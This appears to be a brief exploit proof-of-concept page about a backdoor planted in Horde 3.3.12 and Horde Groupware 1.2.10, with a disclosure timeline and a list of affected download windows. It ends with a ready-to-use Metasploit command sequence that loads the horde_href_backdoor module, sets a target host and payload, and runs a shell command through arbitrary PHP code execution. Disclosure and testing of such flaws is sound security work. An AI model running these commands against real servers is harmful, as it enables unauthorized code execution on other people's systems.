Timeline :

Public release of the vulnerability on 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang on 2012-02-15
Metasploit PoC provided by jduck on 2012-02-16

PoC provided by :

Eric Romang

Reference(s) :


Affected version(s) :

Horde 3.3.12 downloaded between November 15 and February 7
Horde Groupware 1.2.10 downloaded between November 9 and February 7
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2 and February 7

Tested on Ubuntu 11.10 with :

Horde 3.3.12

Description :

This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.

Commands :

use exploit/multi/http/horde_href_backdoor
set VHOST devnull.zataz.loc
set PAYLOAD cmd/unix/generic
set CMD uname -a